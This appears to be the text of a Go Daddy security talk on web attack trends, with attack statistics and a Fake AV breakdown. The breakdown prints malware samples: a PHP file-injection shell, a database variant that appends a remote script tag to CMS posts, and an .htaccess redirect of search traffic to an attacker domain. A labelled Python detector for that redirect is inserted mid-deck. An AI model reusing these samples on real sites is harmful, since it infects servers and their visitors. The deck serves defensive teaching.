Ganesh Devarajan & Todd Redfoot KEEPING UP WITH THE WEB APPLICATION SECURITY.

Introduction
 Todd Redfoot
 Chief Information Security Officer
 Ganesh Devarajan
 Sr. Security Architect
The Background
(What does Go Daddy do?)
What does Go Daddy do?
 9.4 Million Customers
 48 Million Domains Under Management
 Over 5 million Active Hosting Accounts
 1/3 of all DNS queries run through our servers
 We register, renew or transfer more than one domain name every second
What does Go Daddy do?
 40+ Security Professionals in Team
 24 x 7 Operations Center
 Research
 Engineering
 Forensics
 Customer Security Advisors
 Penetration Testing
 User Administration
 Development
The Numbers
(What does Go Daddy see?)
What do we see?
 Monitor over 100,000 events per second
 8.6 Billion/Day
 DDoS - ~900 Attacks per day / 6K per week
 Feb 2011 - Largest attack @ 21M pps
 Last Week – 40G Attack
 Brute Force – 3.5M per hour
What do we see?
 “Other” Attacks :
 425K – Invalid Directory Traversal
 90K – XSS Prevention
 115K – SQL Injection Prevention
… all in a 24 hour period…
Current Trends
SSH Brute Forcers
[Pie chart - SSH brute-force sources by country: US 54%, CN 20%, KR 6%, BG 4%, AR 3%; JP, CA, BR, FR, TW at small shares]
SSH Brute Forcers
Englewood, Colorado
140 Million attempts
MS-SQL Brute Forcers
[Pie chart - MS-SQL brute-force sources by country: US 65%, CN 24%, TR 5%; CA, KR, IE, VN, RU, TH each 2% or less]
MS-SQL Brute Forcers
Orlando, FL
348 Million attempts
My-SQL Brute Forcers
[Pie chart - MySQL brute-force sources by country: US 78%, CN 12%, CA 4%; SE, PH, MY, FR, JP, IN, KR each 2% or less]
My-SQL Brute Forcers
FTP Brute Forcers
[Pie chart - FTP brute-force sources by country: CN 66%, US 26%, HK 2%; TW, DE, RS, KR, IE, BR, CA each 2% or less]
FTP Brute Forcers
XingPing, CN
12 Million attempts
Brute Forcers - All
[Pie chart - all brute-force sources by country: US 60%, CN 27%; TR, KR, CA, BG, TH, AR, TW each 4% or less]
Brute Forcers - US
Garden City, NY
75.7 Million attempts
Brute Forcers - CN
Datong, CN
22.5 Million attempts
Brute Forcinator
SQL Injection
[Pie chart - SQL injection sources by country: US 41%, CN 28%, BG 9%, UK 5%, NL 4%, ID 4%, CZ 3%, FR 2%, AU 2%, JP 2%]
SQL Injection
Seattle, WA
1.3 Million attempts
Backdoor Shells
[Pie chart - backdoor shell sources by country: US 87%, ID 4%, NG 2%, AL 1%; NL, BR, DE, CA, CN, UK each 2% or less]
Backdoor Shells
Phone Company (91%)
Mountain View, CA
PHP Attacks
[Pie chart - PHP attack sources by country: US 66%, KR 8%, FR 6%, UK 3%, LU 3%; NL, CA, BR, RU, DE each 4% or less]
PHP Attacks
Berlin, Germany
1.9 Million attempts
PHP Attacks
Montreal, CA
1.1 Million attempts
Botnet
[Pie chart - botnet sources by country: US 51%, UK 7%, KR 6%, PL 6%, FR 6%, CA 6%, DE 6%, RU 5%, NL 4%, AU 3%]
Botnet - Source - https://zeustracker.abuse.ch/
Botnet - Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps
Phishing
The Good, Bad and Ugly?
The Bad – Most Events
The Ugly – Security Events & DDoS
New Trends
Recent Changes
 “Hacktivists”
 Lulzsec = Twitter
 ComodoHacker = Pastebin
 Phishing -> Spear Phishing
 Targeted & Coordinated Attacks
 RSA / Lockheed Martin Connection
What’s in the News?
More of the same…
 More Client-side Exploits
 Browser exploits
 Adobe exploits
 Web Server Compromises
 Brute Force Attacks
 Leveraging Web Application Vulnerabilities
 Config files with passwords
Fake AV
 Scareware
 Reports fake viruses to users
 Asks for fee to remove the threat
 Paying does nothing but give them your CC#
 $10 Million in Revenue last year
Fake AV Analysis
Fake AV – Attack Breakdown
Servers with Compromised Accounts
(Zeus/Phishing/etc)
Compromised Attack Server(s)
FTP/SSH Upload of Attack Shell/Script
Make HTTP calls to infection script and site is infected
Casual Web User Visits Infected Site
<script>http://intermediary.com/ll.php</script>
Registrant:
Hilary Kneber [email protected]
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
End Users
GET http://intermediary.com/ll.php
Disposable Domain Name
<html>Holy Crap! Infected! Click Here to clean</html>
$$$$$$
Fake AV Basterds
Fake AV – Sample Shell
$z=$_SERVER["DOCUMENT_ROOT"];
$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';
@unlink($_SERVER['SCRIPT_FILENAME']);
$val=$z;
$totalinjected=0;
echo "Working with $val\n!!STARTING!!";
ob_flush();
$start_time=microtime(true);
if ($val!="")do_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";
Fake AV – DB Variant
…
$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';
...
$link=mysql_connect($host,$user,$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}else{
echo 'Connected successfully'."\n";
$db_list = mysql_list_dbs($link);
$bases = array();
while ($row = mysql_fetch_object($db_list)) {
$bases[]=$row->Database;
}
…
//wordpress
if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }
//joomla
if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')"; }
//drupal
if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2"; }
if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')"; }
Fake AV - Search Redirect
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]
</IfModule>
addhandler x-httpd-php-cgi .php4
addhandler x-httpd-php5-cgi .php5
addhandler x-httpd-php5-cgi .php
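A defender-side check for the pattern in the .htaccess sample above, added here as an example and not part of the talk: it flags any RewriteRule that redirects visitors arriving from a search-engine referrer to a host the site does not own. The embedded .htaccess text and the redirect host are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the .htaccess above (not a real file);
# the redirect host is a placeholder, and a legitimate HTTPS redirect
# is included to show that it is not flagged.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://redirect-host.example/in.php?g=945 [R,L]
</IfModule>
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L]
"""

SEARCH_ENGINES = ("google", "bing", "yahoo", "msn", "ask.com",
                  "aol", "live.com", "altavista", "excite")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def find_search_redirects(htaccess_text, own_hosts):
    """Return [(line_no, target)] for each RewriteRule that sends visitors
    arriving from a search engine to a host outside own_hosts.
    RewriteCond lines accumulate until the RewriteRule that consumes them,
    which is how mod_rewrite scopes conditions."""
    own_hosts = {h.lower() for h in own_hosts}
    findings, referer_patterns = [], []
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        cond = COND_RE.match(line)
        if cond:
            referer_patterns.append(cond.group(1).lower())
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        target, flags = rule.group(2), (rule.group(3) or "").upper().split(",")
        host = (urlparse(target).hostname or "").lower()
        is_redirect = any(f.strip().startswith("R") for f in flags)   # R or R=3xx
        external = bool(host) and host not in own_hosts
        from_search = any(se in p for p in referer_patterns for se in SEARCH_ENGINES)
        if is_redirect and external and from_search:
            findings.append((line_no, target))
        referer_patterns = []   # conditions only apply to this rule
    return findings


if __name__ == "__main__":
    for line_no, target in find_search_redirects(SAMPLE_HTACCESS, {"www.example.com"}):
        print(f"line {line_no}: conditional search-engine redirect to {target}")
```

Run it over every .htaccess under a hosting document root with the site's own hostnames in own_hosts; a hit on a catch-all pattern like `.*` is the signature shown in the slide.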
Custom Monitoring
UDP Flooder
How to Protect?
Website Vulnerability Scanners
 Website Protection - Site Scanner ($48/Year)
 Beyond Security ($99.95/Year)
 McAfee Secure™ (~$2100/Year)
 WhiteHat Security®
 IBM AppScan®
 Cenzic®
 HP WebInspect®
Web Based Malware Detection
 Virtual machine Honey pots
 Monitor creation of new processes, file system or registry entries, etc.
 Browser Emulation
 Reputation Service
 Internet’s black list
 Signature Based Detection/Prevention
 Intrusion Detection System/Intrusion Prevention System
 Anti-Virus
New Methodologies
Questions?
Thank You
 Ganesh Devarajan
 [email protected]
 Todd Redfoot
 [email protected]